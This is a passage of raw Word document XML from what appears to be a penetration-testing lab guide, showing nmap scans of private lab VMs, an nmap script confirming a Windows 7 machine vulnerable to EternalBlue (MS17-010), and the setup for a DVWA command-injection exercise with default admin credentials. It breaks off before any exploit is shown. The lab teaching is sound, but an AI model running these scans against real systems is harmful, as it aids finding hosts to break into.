          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="00621C51" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B1F7A6F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CEE6EC" wp14:editId="277D8FA0">
                  <wp:extent cx="4445000" cy="2500312"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="107" name="Figure 6 - img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3"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4445000" cy="2500312"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A8B630" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16FBC731" wp14:editId="54156303">
                  <wp:extent cx="4445000" cy="2500312"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="108" name="Figure 6 - img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4"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4445000" cy="2500312"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EE510D6" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C3D189" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 — Confirm Windows 7 is vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="274A5D4C" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9EEFE" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Port 445 open and VULNERABLE: MS17-010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8283EE" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p445 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C0C77" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script smb-vuln-ms17-010 -p445 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="357AEEFB" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E470440" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53845D7B" wp14:editId="18030709">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="109" name="Figure 7 - img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5"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="482EE408" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EEE05F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="240" w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Part 3 — Exploit A: DVWA Command Injection (VM .101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2271B4" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 8 — DVWA login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0070F464" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C4652" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The DVWA login screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57026EC9" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:rPr>
          <w:t>http://192.168.56.101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  click</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  log </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>in  admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> / admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136106CD" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>This is a browser step — screenshot the DVWA login page.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="404F1B9C" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C4EA651" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4731A575" wp14:editId="56A55464">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="110" name="Figure 8 - img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7"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35E313A1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6374C6CD" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 9 — Set DVWA security to Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB92F9" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B420E87" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Security level set to Low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30345A76" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">menu  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
